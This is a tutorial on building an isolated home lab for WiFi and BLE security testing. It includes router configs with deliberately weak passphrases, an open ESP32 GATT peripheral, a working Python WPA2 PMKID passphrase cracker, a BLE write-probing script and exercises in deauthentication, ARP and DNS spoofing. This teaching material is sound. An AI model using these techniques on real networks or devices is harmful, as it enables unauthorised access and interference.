Setting Up a Home Lab for Wireless Security Testing

Practicing wireless security techniques on networks you do not own is illegal. A home lab gives you a legal, controlled environment to learn and experiment. You set up your own networks, attack your own devices, and break things without consequences.

This guide covers building an affordable, practical home lab for WiFi and BLE security testing - from the minimum equipment needed to a more comprehensive setup for serious research.

Why You Need a Lab

Reading about wireless attacks is not the same as doing them. You need hands-on practice to understand timing, troubleshoot tools, and develop intuition for what works and what does not. A lab lets you:

  • Practice attacks safely and legally
  • Test tools without risking production networks
  • Experiment with different configurations and defenses
  • Build muscle memory with security tools
  • Prepare for security certifications (OSCP, CEH, WiFi-specific certs)
  • Test your own products' wireless security

You do not need expensive equipment. A basic lab costs under $150, and you may already own most of the components.

Lab Components

graph TD
    subgraph "Attacking Machine"
        A["Laptop with Kali Linux"] --> B["USB WiFi Adapter\n(Monitor Mode)"]
        A --> C["BLEShark Nano\n(WiFi + BLE)"]
        A --> D["Bluetooth Adapter\n(for BLE MITM)"]
    end
    subgraph "Target Network"
        E["Test Router\n(WPA2/WPA3)"] --> F["Client Device 1\nSmartphone"]
        E --> G["Client Device 2\nLaptop/Pi"]
        E --> H["IoT Device\n(optional)"]
    end
    subgraph "BLE Targets"
        I["BLE Peripheral\n(ESP32/Arduino)"] --> J["GATT Server\nCustom Services"]
        K["Smart Device\n(Light, Lock, Sensor)"] --> L["Companion App"]
    end
    subgraph "Isolation"
        M["Lab Router NOT\nConnected to Internet"] --> N["Separate from\nHome Network"]
    end

Home lab architecture - attacking machine, target network, BLE targets, all isolated from your home network

At minimum, you need:

  1. A test router - A cheap WiFi router dedicated to the lab
  2. An attacking machine - A laptop running Kali Linux (VM or bare metal)
  3. A WiFi adapter - A USB adapter that supports monitor mode
  4. A client device - Something connected to the test router (old phone, Raspberry Pi)

Optional but valuable additions:

  • BLEShark Nano for WiFi and BLE testing from a pocket device
  • BLE peripherals (ESP32 dev boards, smart home devices) for BLE research
  • Additional routers for testing different configurations
  • A managed switch for wired attack practice

Setting Up the Test Router

Any old WiFi router works. You can often find them for under $20 at thrift stores or online. The specific model does not matter much, but look for:

  • WPA2 support (nearly universal)
  • WPA3 support (if you want to test modern security)
  • 2.4 GHz and 5 GHz bands
  • Admin interface for configuration

Router configuration for lab use:

  1. Factory reset the router
  2. Set the SSID to something identifiable: "LAB_NETWORK"
  3. Set WPA2-PSK with a known password (you will be cracking this)
  4. Disable WPS (or enable it to practice WPS attacks)
  5. Set a static channel instead of auto (makes monitoring easier)
  6. DO NOT connect the WAN port to anything - keep it isolated

Consider running multiple SSIDs with different security configurations:

  • "LAB_WPA2" - WPA2-PSK with a simple password (for handshake practice)
  • "LAB_WPA2_STRONG" - WPA2-PSK with a complex password (for wordlist testing)
  • "LAB_OPEN" - Open network (for MITM practice)

If your router supports OpenWrt firmware, flash it. OpenWrt gives you far more control over wireless settings, lets you run packet captures on the router itself, and exposes settings that stock firmware hides.
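As an added example (not from the original article or the OpenWrt project), this is what the three-SSID layout above looks like in OpenWrt's /etc/config/wireless. It assumes the generated config already defines a radio called radio0 (keep its device-specific `option path` line; only the channel is changed here) and the default `lan` network; the passphrases are constructed lab values.

```conf
# /etc/config/wireless fragment for the lab router (OpenWrt 21.02 or later syntax)

config wifi-device 'radio0'
	option type 'mac80211'
	# keep the 'option path' line from the generated file here
	option band '2g'
	option channel '6'            # fixed channel, never 'auto': keeps monitoring simple
	option htmode 'HT20'

config wifi-iface 'lab_wpa2'
	option device 'radio0'
	option mode 'ap'
	option network 'lan'
	option ssid 'LAB_WPA2'
	option encryption 'psk2'      # WPA2-PSK with CCMP only (no TKIP fallback)
	option key 'sunshine1'        # deliberately weak: it is in rockyou.txt
	option wps_pushbutton '0'     # WPS off; flip to '1' only for the WPS exercise
	option ieee80211w '0'         # PMF off; set to '2' for the Level 5 deauth-resistance test

config wifi-iface 'lab_wpa2_strong'
	option device 'radio0'
	option mode 'ap'
	option network 'lan'
	option ssid 'LAB_WPA2_STRONG'
	option encryption 'psk2'
	option key 'Correct-Horse-Battery-Staple-7719'   # not in any wordlist; rules will not find it either
	option wps_pushbutton '0'

config wifi-iface 'lab_open'
	option device 'radio0'
	option mode 'ap'
	option network 'lan'
	option ssid 'LAB_OPEN'
	option encryption 'none'      # open network for the MITM exercises
```

Apply it with `wifi reload` (or `/etc/init.d/network restart`). Because the WAN port is left unplugged, nothing in this file routes anywhere; the `lan` network is the whole lab.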

The Attacking Machine

A laptop running Kali Linux is the standard. See our guide on setting up a pentesting VM for details.

For wireless testing specifically, bare-metal Kali (dual-boot or a dedicated laptop) is more reliable than a VM: a VM cannot put the host's built-in WiFi card into monitor mode, so you have to pass a USB adapter through to the guest, which adds latency and can drop the device mid-capture. An older ThinkPad (T480, T450) running Kali makes an excellent dedicated pentesting machine for under $200.

Essential tools to have installed:

# WiFi tools
sudo apt install aircrack-ng wireshark hashcat hcxdumptool hcxtools

# Network tools
sudo apt install nmap bettercap ettercap-graphical

# BLE tools
sudo apt install bluez bluetooth btscanner
# Kali's system Python is externally managed (PEP 668), so a bare
# "pip install" is refused; install bleak into a virtual environment instead
python3 -m venv ~/lab-venv
~/lab-venv/bin/pip install bleak   # Python BLE library

# General
sudo apt install python3-scapy tcpdump

The BLEShark Nano supplements the laptop as a portable testing platform. Use it for quick WiFi scanning and handshake capture when you do not want to set up the laptop, then transfer captures to Kali for analysis and cracking.

Client Devices

You need something connected to the test network to practice against. Options:

Old smartphone (best option): Connect it to the lab WiFi network. It generates realistic traffic, supports WPA2/WPA3, and can run apps for BLE testing. An old Android phone with developer mode enabled is ideal.

Raspberry Pi: A Pi connected to the lab network can run as a web server, SSH server, or general client. You can also use it as a secondary attack machine.

# Set up a simple web server on the Pi for testing
python3 -m http.server 80

Old laptop: Any laptop with WiFi can be a target device. Run it with Windows for practicing Windows-specific attacks, or Linux for more flexibility.

The client device's job is to be connected to the test router so you have a legitimate connection to deauthenticate, handshakes to capture, and traffic to intercept.

BLE Test Targets

For BLE security testing, you need BLE peripherals to scan, connect to, and test.

ESP32 dev board (best for learning): An ESP32 running a simple GATT server gives you a controllable BLE peripheral. You write the firmware, so you know exactly what the device does and can introduce deliberate vulnerabilities for testing.

// Simple Arduino BLE peripheral for testing (ESP32 Arduino core, built-in BLE library)
#include <BLEDevice.h>
#include <BLEUtils.h>
#include <BLEServer.h>

// Arbitrary lab UUIDs; the client-side scripts look for these exact strings
#define LAB_SERVICE_UUID        "12345678-1234-1234-1234-123456789abc"
#define LAB_CHARACTERISTIC_UUID "abcdefab-1234-1234-1234-abcdefabcdef"

void setup() {
    BLEDevice::init("LAB_BLE_DEVICE");                 // advertised device name
    BLEServer *server = BLEDevice::createServer();
    BLEService *service = server->createService(LAB_SERVICE_UUID);

    // Readable and writable by anyone: no encryption or authentication is
    // required, which is the deliberately weak behaviour you will test against
    BLECharacteristic *characteristic = service->createCharacteristic(
        LAB_CHARACTERISTIC_UUID,
        BLECharacteristic::PROPERTY_READ | BLECharacteristic::PROPERTY_WRITE
    );
    characteristic->setValue("Hello Lab");
    service->start();

    // Put the service UUID in the advertisement so scanners see it without connecting
    BLEAdvertising *advertising = server->getAdvertising();
    advertising->addServiceUUID(LAB_SERVICE_UUID);
    advertising->start();
}

void loop() { delay(1000); }

Smart home devices: Cheap BLE smart bulbs, sensors, or plugs make realistic targets. Many use minimal or no authentication, making them perfect for practicing BLE attacks with tools like GATTacker.

The BLEShark Nano itself is a BLE device that you can scan and interact with from your laptop using tools like bettercap or custom Python scripts with the bleak library.

Network Isolation

This is critical. Your lab network must be isolated from your home network and the internet.

Physical isolation (simplest): Do not connect the lab router's WAN port to anything. The lab network exists only between the router and the devices connected to it. No internet access, no connection to your home network.

VLAN isolation (more advanced): If you have a managed switch, put the lab router's LAN side on its own VLAN with no route to your home VLAN or the internet. This lets you share physical infrastructure while keeping ARP, DHCP and IP traffic separate. It does nothing for the radio side: deauth frames and channel congestion are not VLAN-aware, so the channel planning below still applies.

Why isolation matters:

  • ARP spoofing attacks affect the entire broadcast domain - if your lab is on your home network, you will disrupt your own traffic
  • Deauthentication frames are addressed to a BSSID and, optionally, one client, so a correctly targeted deauth only affects your lab router's clients; a typo in the BSSID, or a tool run without a target filter, knocks neighbours' devices offline, which is illegal interference rather than a nuisance
  • Running exploit tools on a shared network risks accidentally targeting the wrong systems
  • Some attacks generate a lot of traffic that can slow down the entire network

Channel selection: Set your lab router to a channel that is not used by your home network or neighbors. Use a WiFi analyzer app to find the least congested channel. On 2.4 GHz, channels 1, 6, and 11 are non-overlapping. On 5 GHz there are many non-overlapping channels, but avoid the DFS range (roughly channels 52-144): most adapters refuse to transmit or inject there until radar detection has passed, and OpenWrt will pull the AP off the air on a radar event.

Lab Exercises

Once your lab is set up, here are progressive exercises to build skills:

Level 1 - Reconnaissance:

  1. Scan for networks with airodump-ng
  2. Identify the test router's BSSID, channel, and encryption
  3. List connected clients
  4. Capture probe requests from client devices
  5. Scan with the BLEShark Nano and compare results
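Steps 1 through 4 produce a CSV when you run airodump-ng with `-w lab --output-format csv`. The script below is an added example (not from the original article or any tool's own code) that parses that file, reports the lab router's BSSID, channel, encryption, associated clients and the stations probing for the lab SSID, and adds the check every later exercise should start with: refusing a target BSSID that is not your own router. The embedded CSV is constructed in airodump-ng's layout; the MAC addresses and the `LAB_NETWORK` SSID are the lab values assumed throughout.

```python
"""Parse the CSV that `airodump-ng -w lab --output-format csv wlan0mon` writes
(lab-01.csv), pick out the lab router and its clients, and refuse any target
BSSID that is not the lab's own."""
import csv
import io
from dataclasses import dataclass, field

LAB_ESSID = "LAB_NETWORK"   # the SSID configured on the test router

# Constructed sample in airodump-ng's CSV layout; not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,  11, LAB_NETWORK, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -75,  40, 0,   0.  0.  0.  0,  12, NeighborWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:01, 2024-01-01 10:00:01, 2024-01-01 10:05:00, -45, 300, AA:BB:CC:DD:EE:01, LAB_NETWORK
11:22:33:44:55:02, 2024-01-01 10:00:01, 2024-01-01 10:05:00, -60,  12, (not associated), LAB_NETWORK,CoffeeShop
11:22:33:44:55:03, 2024-01-01 10:00:01, 2024-01-01 10:05:00, -80,   5, AA:BB:CC:DD:EE:02, 
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str
    essid: str
    clients: list = field(default_factory=list)


@dataclass
class Station:
    mac: str
    bssid: str          # "(not associated)" when the station is only probing
    probed: list        # ESSIDs seen in its probe requests


def parse_airodump_csv(text):
    """Return ({bssid: AccessPoint}, [Station]) from airodump-ng CSV text."""
    ap_part, _, sta_part = text.partition("Station MAC")
    aps = {}
    for row in csv.reader(io.StringIO(ap_part), skipinitialspace=True):
        if len(row) < 14 or row[0] == "BSSID":      # header or blank line
            continue
        aps[row[0]] = AccessPoint(row[0], int(row[3]), row[5], row[13])
    stations = []
    for row in csv.reader(io.StringIO(sta_part), skipinitialspace=True):
        if len(row) < 6 or not row[0]:              # header remainder or blank line
            continue
        # Probed ESSIDs are themselves comma separated, so they spill across
        # several CSV fields; glue everything after the BSSID column back together.
        probed = [p.strip() for p in row[6:] if p.strip()]
        st = Station(row[0], row[5], probed)
        stations.append(st)
        if st.bssid in aps:
            aps[st.bssid].clients.append(st.mac)
    return aps, stations


def find_lab_ap(aps, essid=LAB_ESSID):
    """Exactly one AP must carry the lab SSID. Zero means the router is off or
    on a band you are not scanning; several means an evil-twin experiment is
    still running, or a neighbour picked the same name. Either way, stop."""
    matches = [ap for ap in aps.values() if ap.essid == essid]
    if len(matches) != 1:
        raise LookupError(f"expected exactly one {essid!r} AP, found {len(matches)}")
    return matches[0]


def assert_in_scope(target_bssid, lab_ap):
    """Call this before any deauth or injection: only the lab BSSID is fair game."""
    if target_bssid.upper() != lab_ap.bssid.upper():
        raise PermissionError(f"{target_bssid} is not the lab router ({lab_ap.bssid}); refusing")
    return True


def recon_report(text):
    aps, stations = parse_airodump_csv(text)
    lab = find_lab_ap(aps)
    probing = [s.mac for s in stations if lab.essid in s.probed and s.bssid != lab.bssid]
    return {
        "bssid": lab.bssid, "channel": lab.channel, "privacy": lab.privacy,
        "clients": lab.clients, "probing_for_lab": probing,
        "other_aps_seen": sorted(b for b in aps if b != lab.bssid),
    }


if __name__ == "__main__":
    import json
    import sys
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    print(json.dumps(recon_report(src), indent=2))
```

Run it as `python3 recon.py lab-01.csv` against a real dump, or with no argument to see the constructed sample. The `other_aps_seen` list is the networks you must not touch; the `probing_for_lab` list is what step 4 is asking you to notice, a client that remembers the lab SSID and announces it even when not connected.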

Level 2 - WPA Handshake Capture and Cracking:

  1. Set the lab router password to something in rockyou.txt (Kali ships it as /usr/share/wordlists/rockyou.txt.gz; gunzip it once)
  2. Capture a handshake: run airodump-ng on the router's fixed channel, then deauth the client with aireplay-ng so it reconnects and performs the 4-way handshake
  3. Convert the capture to hashcat's 22000 format with hcxpcapngtool
  4. Crack with hashcat in mode 22000, first with the plain wordlist, then wordlist plus rules
  5. Try PMKID capture with hcxdumptool (no client or deauth needed, but it only works when the router includes a PMKID in the first EAPOL message; many do not, so a miss here is a data point, not a tooling error)
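To see what hashcat is actually racing in steps 3 to 5, here is the PMKID path of mode 22000 written out in plain Python. This is an added example, not the article's or hashcat's code: it derives the WPA2 PMK from each candidate passphrase with PBKDF2-HMAC-SHA1 (4096 iterations, as 802.11 specifies), computes the PMKID the way the access point does, and compares it with the one in a `WPA*01` line. The SSID, MAC addresses, passphrase and wordlist are constructed lab values; the "captured" line is generated from them in the block itself rather than taken from a real capture.

```python
"""hashcat mode 22000, PMKID variant, spelled out: derive PMK from a candidate
passphrase, recompute PMKID, compare. Slow in Python, but the mechanics are
exactly what decides whether a router passphrase survives a wordlist."""
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # The 4096 iterations are the whole work factor; everything else is one HMAC.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes of the tag.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def hc22000_pmkid_line(pmkid_hex: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """The WPA*01 line hcxpcapngtool emits for a PMKID (the WPA*02 form carries
    an EAPOL MIC instead and needs the full PTK derivation; same PMK, more work)."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_hex, mac_bytes(ap_mac).hex(), mac_bytes(sta_mac).hex(), ssid.encode().hex())


def parse_hc22000(line: str) -> dict:
    parts = line.strip().split("*")
    if parts[0] != "WPA" or parts[1] != "01":
        raise ValueError("only PMKID (WPA*01) lines are handled here")
    return {"pmkid": bytes.fromhex(parts[2]), "ap": bytes.fromhex(parts[3]),
            "sta": bytes.fromhex(parts[4]), "ssid": bytes.fromhex(parts[5]).decode()}


def crack_pmkid(line: str, wordlist):
    """Return the passphrase that reproduces the PMKID, or None."""
    tgt = parse_hc22000(line)
    for cand in wordlist:
        cand = cand.rstrip("\r\n")
        if not 8 <= len(cand) <= 63:        # WPA-PSK passphrases are 8..63 characters
            continue                        # so hashcat skips these without hashing
        if pmkid(wpa2_pmk(cand, tgt["ssid"]), tgt["ap"], tgt["sta"]) == tgt["pmkid"]:
            return cand
    return None


# Constructed lab values; not a real capture.
LAB_SSID = "LAB_WPA2"
LAB_AP = "AA:BB:CC:DD:EE:01"
LAB_STA = "11:22:33:44:55:01"
LAB_PASSPHRASE = "sunshine1"        # the weak passphrase set on the router
SMALL_WORDLIST = ["123456", "password", "iloveyou", "sunshine", "sunshine1", "princess"]

# What hcxdumptool + hcxpcapngtool would hand you for this router and client.
CAPTURED_LINE = hc22000_pmkid_line(
    pmkid(wpa2_pmk(LAB_PASSPHRASE, LAB_SSID), mac_bytes(LAB_AP), mac_bytes(LAB_STA)).hex(),
    LAB_AP, LAB_STA, LAB_SSID)


if __name__ == "__main__":
    print(CAPTURED_LINE)
    print("recovered:", crack_pmkid(CAPTURED_LINE, SMALL_WORDLIST))
```

Point the same function at rockyou.txt (`crack_pmkid(line, open("/usr/share/wordlists/rockyou.txt", encoding="latin-1"))`) and you will feel the work factor: a few thousand candidates per second in Python versus hundreds of thousands per second for hashcat on a GPU. That ratio, and the fact that the PMK depends on the SSID, is why "LAB_WPA2_STRONG" with a long random passphrase stays uncracked however long you leave it running.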

Level 3 - Network Attacks (after connecting to lab network):

  1. Run nmap to discover devices on the network
  2. Perform ARP spoofing with bettercap
  3. Capture traffic from the client device
  4. Run DNS spoofing to redirect traffic
  5. Set up a captive portal

Level 4 - BLE Testing:

  1. Scan for BLE devices with the BLEShark Nano
  2. Enumerate GATT services with bettercap or a Python script
  3. Read and write BLE characteristics
  4. Set up GATTacker for BLE MITM
  5. Analyze BLE traffic in Wireshark
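Steps 2 and 3 against the ESP32 peripheral, as an added example with the bleak library (this is not the article's or bleak's own code). The interesting question is not whether a characteristic is writable in principle but whether the peripheral accepts the write before any pairing has happened; the script enumerates the GATT database, tries every readable and writable characteristic, and sorts the outcomes. It assumes bleak 0.20 or later for `BleakScanner.find_device_by_name`, the device name and characteristic UUID from the sketch above, and a constructed write payload; the two helpers that do the classifying are plain functions so they can be exercised without a radio.

```python
"""Enumerate the lab peripheral's GATT database with bleak, then attempt reads
and writes before pairing to find characteristics with no access control."""
import asyncio

LAB_DEVICE_NAME = "LAB_BLE_DEVICE"                         # from the ESP32 sketch
LAB_CHAR_UUID = "abcdefab-1234-1234-1234-abcdefabcdef"     # its read/write characteristic


def probe_plan(services):
    """services: [(service_uuid, [(char_uuid, [property, ...]), ...]), ...]
    Returns which characteristics to read, write and subscribe to, based on
    the properties the peripheral advertises. Pure function, no radio needed."""
    plan = {"read": [], "write": [], "notify": []}
    for _svc_uuid, chars in services:
        for char_uuid, props in chars:
            props = {p.lower() for p in props}
            if "read" in props:
                plan["read"].append(char_uuid)
            if props & {"write", "write-without-response"}:
                plan["write"].append(char_uuid)
            if props & {"notify", "indicate"}:
                plan["notify"].append(char_uuid)
    return plan


def findings(results):
    """results: {(char_uuid, op): (status, detail)} with status 'ok' or 'error'.
    A write the peripheral accepted with no pairing is the finding. An error
    that mentions authentication or encryption means the device enforced a
    security level (a heuristic on the error text BlueZ/bleak produce, so
    confirm it in Wireshark); anything else is left for manual review."""
    out = []
    for (uuid, op), (status, detail) in results.items():
        if status == "ok" and op == "write":
            out.append((uuid, "accepts writes without pairing"))
        elif status == "error" and any(k in str(detail).lower() for k in ("auth", "encrypt")):
            out.append((uuid, f"{op} requires pairing"))
    return out


async def enumerate_and_probe(name=LAB_DEVICE_NAME, payload=b"lab-write-test"):
    # Imported here so the helpers above run without bleak installed.
    from bleak import BleakClient, BleakScanner
    from bleak.exc import BleakError

    dev = await BleakScanner.find_device_by_name(name, timeout=10.0)
    if dev is None:
        raise RuntimeError(f"{name} not seen; is the ESP32 advertising?")
    results = {}
    async with BleakClient(dev) as client:
        services = [(s.uuid, [(c.uuid, list(c.properties)) for c in s.characteristics])
                    for s in client.services]
        plan = probe_plan(services)
        for uuid in plan["read"]:
            try:
                results[(uuid, "read")] = ("ok", bytes(await client.read_gatt_char(uuid)))
            except BleakError as e:
                results[(uuid, "read")] = ("error", str(e))
        for uuid in plan["write"]:
            try:
                # response=True so a rejection comes back as an ATT error, not silence
                await client.write_gatt_char(uuid, payload, response=True)
                results[(uuid, "write")] = ("ok", payload)
            except BleakError as e:
                results[(uuid, "write")] = ("error", str(e))
    return services, results


if __name__ == "__main__":
    svcs, res = asyncio.run(enumerate_and_probe())
    for svc_uuid, chars in svcs:
        print("service", svc_uuid)
        for char_uuid, props in chars:
            print("   ", char_uuid, ",".join(props))
    for uuid, verdict in findings(res):
        print("FINDING", uuid, verdict)
```

Against the unmodified sketch you should get one finding: the lab characteristic accepts the write, and a subsequent read returns `lab-write-test` instead of `Hello Lab`. Rebuild the firmware with an encryption requirement on the characteristic and the same script reports `write requires pairing`, which is the Level 5 BLE check.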

Level 5 - Defense Testing:

  1. Enable WPA3 (SAE) on the router and repeat the handshake exercise; there is no offline-crackable handshake, so look at what your capture actually contains
  2. Enable 802.11w (Protected Management Frames) and rerun the deauth: with PMF required, the client ignores your forged frames, so a handshake only appears when it reconnects on its own
  3. Set up a wireless IDS (like Kismet) and detect your own attacks
  4. Test BLE devices with LE Secure Connections pairing and confirm that unpaired reads and writes are rejected

Scaling Your Lab

As your skills grow, expand the lab:

Multiple routers: Set up routers with different security configurations (WPA2, WPA3, WPA2-Enterprise with a RADIUS server). Practice attacking each and note the differences.

RADIUS server: Set up FreeRADIUS on a Raspberry Pi for WPA2/WPA3-Enterprise testing. This lets you practice EAP attacks and certificate-based authentication.

Wireless IDS: Run Kismet on a dedicated device to detect attacks. This teaches you both offense and defense simultaneously.

Multiple attack machines: Run different operating systems and toolsets. Compare airodump-ng with Kismet, hashcat with JtR, bettercap with ettercap.

IoT lab: Collect cheap IoT devices (smart bulbs, sensors, cameras) for testing. Many have poor security and make interesting targets for research.

Shiver mesh network: If you have multiple BLEShark Nano devices, set up a Shiver mesh network and practice attacks against mesh communications. The mesh uses ESP-NOW with a 20-50m range between nodes.

Budget Breakdown

Minimum viable lab:

Component          Cost       Notes
Old WiFi router    $10-20     Any WPA2-capable router
USB WiFi adapter   $30-70     AR9271 for budget (2.4 GHz only, in-kernel driver); RTL8812AU for dual band (needs the realtek-rtl88xxau-dkms driver on Kali)
Old smartphone     $0-30      Any old Android phone
Laptop             $0+        Use existing, or $150-200 for a used ThinkPad
Total minimum      $40-120

Enhanced lab:

Component          Cost       Notes
Everything above   $40-120
BLEShark Nano      $36.99+    Portable WiFi + BLE testing
ESP32 dev board    $5-10      BLE test target
Raspberry Pi       $35-60     Client device, RADIUS server
Second router      $10-20     Different security configs
Smart BLE device   $10-20     Realistic BLE target
Total enhanced     $140-270

A home lab is an investment in skills. The cost of equipment is minimal compared to the practical knowledge you gain by working through real attacks and defenses in a controlled environment. Start small, practice the basics, and expand as your skills grow.

This article is for educational purposes. Always practice on equipment you own. Never test wireless security on networks or devices without explicit written permission.
